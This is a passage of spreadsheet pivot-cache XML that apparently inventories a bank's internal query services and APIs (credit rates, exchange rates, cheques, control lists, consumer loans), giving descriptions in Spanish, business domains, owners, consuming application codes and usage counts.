    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW1185001 _x000d__x000a_AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Tasa Credito"/>
    <n v="200"/>
    <x v="0"/>
    <s v="Este servicio cuenta con la capacidad consultar los diferentes rangos de tasas de interés, montos y plazos, entre otros detalles que aplican para un plan de crédito de consumo en función algunas características del cliente y del crédito solicitado."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="BVC-Legados_Clientes legados_ISBVC0011"/>
    <s v="NU0102001 _x000d__x000a_AW1285001 _x000d__x000a_AW0856 _x000d__x000a_AW1313"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Tasa Credito"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio permite consultar las tasas ofrecidas para créditos de consumo (libre inversión)."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW0937 _x000d__x000a_AW0856"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Tasa De Cambio"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Servicio que permite consultar todas aquellas tasas de cambio que a hoy se manejan en el banco, tales como tasa digital, tasa plena, tasa EBS, TRM, entre otras."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Filiales del Exterior"/>
    <x v="1"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="FINACLE"/>
    <s v="SVP _x000d__x000a_AW1011 _x000d__x000a_AW0360"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta TCRM"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio tiene como alcance exponer la TCRM que la SuperIntendencia Financiera brinda por medio de un Web Services, para que cualquier aplicación o proceso de la Organización la pueda consultar en tiempo real."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <x v="10"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW0937 _x000d__x000a_AW1176 _x000d__x000a_AW1081001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Transacciones Prestamo"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Consulta general y detallada de las transacciones de un prestamo"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Variables Precalculadas Riesgos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Permite tomar de la BD de Riesgos, parte de las variables que requiere Motor para el proceso de aprobación en el Flujo de crédito de Consumo e Inmobiliario"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <x v="18"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <s v="Cyxtera"/>
    <s v="AW1097001 _x000d__x000a_AW1081001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Centrales De Riesgo"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Componente que permite realizar la integración entre Bizagi y APM para ir a obtener la aprobación de un solicitante frente a las centrales de riesgo."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <x v="18"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW0922 _x000d__x000a_AW0856"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Cheques"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El usuario desde la sucursal virtual de empresa ó persona a partir de una cuenta del cliente, podrá consultar el estado de los cheques relacionados a una chequera a partir de una cuenta del cliente perteneciente a Filiales del exterior (Miami, Cayman, Panamá y Puerto Rico)."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Cheques Consignados"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Permite consultar la información de los cheques consignados en la cuenta especificada por el cliente, cuentas pertenecientes a cuenta de ahorros o cuenta corriente pertenecientes a Filiales de Exterior._x005f_x000D_ "/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <m/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Clientes Precalculados"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio permite identificar si una persona se encuentra en la base de clientes con créditos precalculados y posee un cupo aprobado."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="Finacle - F.E_Panama_AW0709001"/>
    <s v="AW1097001 _x000d__x000a_AW1081001 _x000d__x000a_AW0939"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Cobro Comision"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Permitir realizar la consulta de cobro de comisión que se aplica a una transacción realizada por un cliente, o consultada antes de realizar la transacción."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Captaciones"/>
    <s v="confirmar EVC dueña del servicio"/>
    <m/>
    <s v="Cuentas AFC_AW1110001"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Condiciones Pago Leasing"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Servicio utilizado por el proyecto de Leasing Habitacional para la consulta de condiciones de pago de un cliente"/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <x v="20"/>
    <s v="Productor"/>
    <s v="Administración del ciclo de vida del activo"/>
    <s v="Juan Pablo Bahamon Betancur"/>
    <m/>
    <m/>
    <s v="AW0360006"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Credito Hipotecario"/>
    <n v="200"/>
    <x v="0"/>
    <s v="El servicio expone capacidades que permiten consultar los proyectos asociados a un cliente constructor, así como los de un grupo económico o fiducias relacionados. Adicionalmente, permite la consulta de obligaciones asociadas a un proyecto hipotecario en particular y movimientos que presenten dichas obligaciones en un rango de fechas específico."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Hipotecario"/>
    <x v="21"/>
    <s v="Productor"/>
    <s v="Hipotecario"/>
    <s v="Martha Luz Pardo"/>
    <m/>
    <s v="Cuentas AFC_AW1110001"/>
    <s v="SAI _x000d__x000a_SVE _x000d__x000a_SCI _x000d__x000a_SVP _x000d__x000a_NU0004001 _x000d__x000a_AUD"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Credito Hipotecario"/>
    <n v="300"/>
    <x v="0"/>
    <s v="El servicio expone capacidades que permiten consultar los proyectos asociados a un cliente constructor, así como los de un grupo económico o fiducias relacionados. Adicionalmente, permite la consulta de datos generales de obligaciones asociadas a un proyecto hipotecario o cliente individual así como movimientos que presenten dichas obligaciones en un rango de fechas específico, pudiendo identificar subrogaciones."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Hipotecario"/>
    <x v="21"/>
    <s v="Productor"/>
    <s v="Hipotecario"/>
    <s v="Martha Luz Pardo"/>
    <m/>
    <s v="Cuentas AFC_AW1110001"/>
    <s v="AW0360004 _x000d__x000a_SVE _x000d__x000a_NU0004001 _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Detalle Chequera"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Permitir consultar el detalle de la(s) chequera(s) a partir de una cuenta corriente del cliente perteneciente a filiales del exterior (Cayman, Panamá, Miami y Puerto Rico)."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="Cuentas AFC_AW1110001"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Detalle Producto"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Realizar Consulta del detalle de un producto independientemente del tipo de producto (CDT, CASA, Crédito Retail, Crédito Corporativo) desde cualquier consumidor hacia Finacle para productos de cualquier filial del exterior.."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <m/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Discrepancias"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Soportar la funcionalidad de consultar las discrepancias levantadas a un cliente para un producto Trade (carta de crédito de importación o garantía standby emitida) por parte de Bancolombia."/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <x v="10"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <m/>
    <m/>
    <s v="AW0611001 _x000d__x000a_AW0360"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Estado Cliente Listas Control"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Tiene como finalidad responder a la necesidad de validar la presencia del cliente en alguna de las listas negras"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <x v="3"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="TDC_Macros para tarjetas_AW0485001"/>
    <s v="AW1177 _x000d__x000a_ELIBOM _x000d__x000a_AW0922 _x000d__x000a_AW0856 _x000d__x000a_AW1097001 _x000d__x000a_AW0998 _x000d__x000a_BSN _x000d__x000a_AW1170 _x000d__x000a_SYC _x000d__x000a_AW0683001 _x000d__x000a_AW1128 _x000d__x000a_AW1011 _x000d__x000a_AW0540001 _x000d__x000a_BancasegurosNube _x000d__x000a_AW0682001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Estado Proveedores Listas Control"/>
    <n v="100"/>
    <x v="0"/>
    <s v="tiene como finalidad responder a la necesidad de validar la presencia del proveedor en alguna de las listas negras"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <x v="3"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="TDC_Macros para tarjetas_AW0485001"/>
    <s v="AW0682001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Fuentes Publicas Externas"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Servicio permite consultar información de diferentes fuentes públicas desde aplicaciones que requieran acceder a este tipo de información. "/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <m/>
    <s v="AW0922 _x000d__x000a_AW0856 _x000d__x000a_AW1097001 _x000d__x000a_AW1170 _x000d__x000a_AW1302001 _x000d__x000a_AW1081001 _x000d__x000a_NU0142001 _x000d__x000a_AW0660001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Giros Realizados"/>
    <n v="200"/>
    <x v="0"/>
    <s v="Permite la consulta de las transferencias externas realizadas desde una cuenta del cliente, perteneciente a filiales del exterior (Panamá, Caymán, Miami, Puerto Rico) y relacionada a los productos cuentas de ahorro y/ó cuentas corrientes."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <m/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Giros Recibidos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Desde la sucursal virtual, el cliente podrá consultar los giros recibidos en una cuenta específica propia de un producto de cuenta de ahorros ó cuenta corriente"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <m/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Informacion Producto"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El usuario de la sucursal virtual (SVP y SVE) podrá solicitar la consulta de saldos ó consulta de movimientos ó consulta de saldos congelados (líen) de manera independiente ó de manera conjunta, es decir, tendrá la posibilidad de solicitar la consulta de saldos, de movimientos y líen con una solicitud."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <m/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Informacion Sesion"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Servicio utilizado por transformación digital para la consulta de información de una sesión "/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <x v="20"/>
    <s v="Productor"/>
    <s v="Administración del ciclo de vida del activo"/>
    <s v="Juan Pablo Bahamon Betancur"/>
    <m/>
    <m/>
    <s v="AW0360006"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Listas Control Especiales"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Tiene como finalidad responder a la necesidad de validar la presencia del cliente en alguna de las listas negras"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <x v="3"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="Finacle - F.E_Panama_AW0709001"/>
    <s v="AW0922 _x000d__x000a_SYC"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Movimientos Producto"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Permitir consultar los Movimientos de un producto de un cliente correspondiente a: Movimientos de créditos retail, Movimientos de créditos corporate y Movimientos CASA (cuentas corrientes y ahorros) con y sin paginación. Los Movimientos de los productos a consultar pertenecen a filiales del exterior (Panamá, Caymán, Miami, Puerto Rico)."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="Administrador de Tasas_AW1168001"/>
    <s v="AW0453 _x000d__x000a_AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Movimientos Producto"/>
    <n v="200"/>
    <x v="0"/>
    <s v="Permitir consultar los Movimientos de un producto de un cliente correspondiente a: Movimientos de créditos retail, Movimientos de créditos corporate y Movimientos CASA (cuentas corrientes y ahorros) con y sin paginación. Los Movimientos de los productos a consultar pertenecen a filiales del exterior (Panamá, Caymán, Miami, Puerto Rico)."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="Administrador de Tasas_AW1168001"/>
    <s v="AW0453"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar MT"/>
    <n v="200"/>
    <x v="0"/>
    <s v="Mostrar al cliente el detalle del MT. Cada vez que se realiza una transferencia vía SWIFT se genera un archivo denominado Formato MT 103 el cual contiene los datos del giro realizado o del giro recibido."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Tesoreria"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="Modulo Parametrizador Compra y Venta de Divisas Tesoreria_AW0899001"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar OTP"/>
    <n v="110"/>
    <x v="0"/>
    <s v="Este servicio permite Consultar el estado de los clientes de los diferentes canales transaccionales del Banco en la aplicación proveedora Detect ID. Indica si el cliente está bloqueado o no."/>
    <m/>
    <m/>
    <x v="10"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <m/>
    <s v="SuperFinanciera"/>
    <s v="AW0638 _x000d__x000a_AW0636"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Saldos Congelados"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Permite la consulta de saldo detallado de cada uno de los tipos de líen (saldos congelados), con base en la cuenta de un titular ó cotitular. Ésta funcionalidad aplica para personas y empresas."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Riesgos"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="Servicios Riesgos_NA_AW1086001"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-06-02T09:43:24"/>
    <s v="Consumer Loan"/>
    <n v="100"/>
    <s v="Consumer Loan - Independent Loan"/>
    <n v="100"/>
    <x v="73"/>
    <s v="Esta API permite consultar la viabiliadad de una solicitud de credito para un cliente indepediente en un producto y/o servicio"/>
    <m/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="RespuestaAlFrente_AW1086001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <m/>
    <n v="6"/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-09-10T13:21:44"/>
    <s v="Consumer Loan Behavioral Models"/>
    <n v="111"/>
    <s v="Consumer Loan Behavioral Models - Consumption Loan Study"/>
    <n v="111"/>
    <x v="74"/>
    <s v="El estudio de crédito de consumo habilita el análisis de un determinado cliente con el fin de evaluar cuales productos de crédito de consumo se le pueden otorgar. Dentro de los productos se tienen Crédito de Libre Inversión, CrediAgily Tarjeta de Crédito"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <x v="18"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <s v="EstudioCreditoConsumo/V1.0"/>
    <m/>
    <s v="EcosistemaRiesgos_AW1011 _x000d__x000a_ NequiAF_AW1011"/>
    <n v="2"/>
    <m/>
    <n v="21669"/>
    <n v="10135"/>
    <n v="5891"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-05-23T16:34:08"/>
    <s v="Consumer Loan Behavioral Models"/>
    <n v="200"/>
    <s v="Consumer Loan Behavioral Models - Consumption Loan Study"/>
    <n v="200"/>
    <x v="74"/>
    <s v="El estudio de crédito de consumo habilita el análisis de un determinado cliente con el fin de evaluar cuales productos de crédito de consumo se le pueden otorgar. Dentro de los productos se tienen Crédito de Libre Inversión, CrediAgily Tarjeta de Crédito"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <x v="18"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <s v="EstudioCreditoConsumo/V1.0"/>
    <m/>
    <s v="RespuestaAlFrente_AW1086001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ PreaprobadosSucursales_AW1299001"/>
    <n v="2"/>
    <m/>
    <n v="21669"/>
    <n v="10135"/>
    <n v="5891"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-09-04T09:50:22"/>
    <s v="Consumer Loans"/>
    <n v="120"/>
    <s v="Consumer Loans - Interest Rate"/>
    <n v="101"/>
    <x v="75"/>
    <s v="En su versión inicial, esta API expone método para consulta de tasas, montos y plazos aplicables a créditos de consumo (libre inversión), permitiendo a los canales de venta donde se ofrezcan este tipo de productos consultar esta información en lí­nea"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <s v="ConsultaTasaCredito/V2.0"/>
    <m/>
    <s v="Aprobaciones_AW036007 _x000d__x000a_ NU0107001_LoansApproval_MR _x000d__x000a_ APP_AW0360007 _x000d__x000a_ aprobaciones_AW0360007 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ MsUtilities_NU0102001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ APP_AW1285001 _x000d__x000a_ APP_NU0102001 _x000d__x000a_ ProductosDeFinanciación_NU0102001 _x000d__x000a_ BNPL_NU0287001"/>
    <n v="15"/>
    <n v="3"/>
    <n v="21"/>
    <n v="7"/>
    <n v="19"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-09-07T18:38:02"/>
    <s v="Consumer Loans"/>
    <n v="120"/>
    <s v="Consumer Loans - Loan Applications"/>
    <n v="101"/>
    <x v="76"/>
    <s v="En su versión inicial, esta API expone capacidades que permiten consultar los detalles relacionados con solicitudes de crédito radicadas, así­ como actualizar el estado de éstas, haciendo posible, en parte, la gestión de este proceso previo al desembolso del crédito."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <m/>
    <m/>
    <s v="Aprobaciones_AW036007 _x000d__x000a_ NU0107001_LoansApproval_MR _x000d__x000a_ APP_AW0360007 _x000d__x000a_ aprobaciones_AW0360007 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ MsUtilities_NU0102001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ APP_AW1285001 _x000d__x000a_ APP_NU0102001 _x000d__x000a_ ProductosDeFinanciación_NU0102001 _x000d__x000a_ BNPL_NU0287001"/>
    <n v="4966"/>
    <n v="8674"/>
    <n v="5118"/>
    <n v="5397"/>
    <n v="4035"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-09-07T18:38:02"/>
    <s v="Consumer Loans"/>
    <n v="120"/>
    <s v="Consumer Loans - Offers"/>
    <n v="200"/>
    <x v="77"/>
    <s v="No tiene Descipcion"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <m/>
    <m/>
    <s v="Aprobaciones_AW036007 _x000d__x000a_ NU0107001_LoansApproval_MR _x000d__x000a_ APP_AW0360007 _x000d__x000a_ aprobaciones_AW0360007 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ MsUtilities_NU0102001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ APP_AW1285001 _x000d__x000a_ APP_NU0102001 _x000d__x000a_ ProductosDeFinanciación_NU0102001 _x000d__x000a_ BNPL_NU0287001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <n v="38"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-09-07T18:38:02"/>
    <s v="Consumer Loans"/>
    <n v="120"/>
    <s v="Consumer Loans - Utilities"/>
    <n v="100"/>
    <x v="78"/>
    <s v="Esta API expone capacidades que resultan complementarias a procesos de crediticios de consumo y libranza."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <m/>
    <m/>
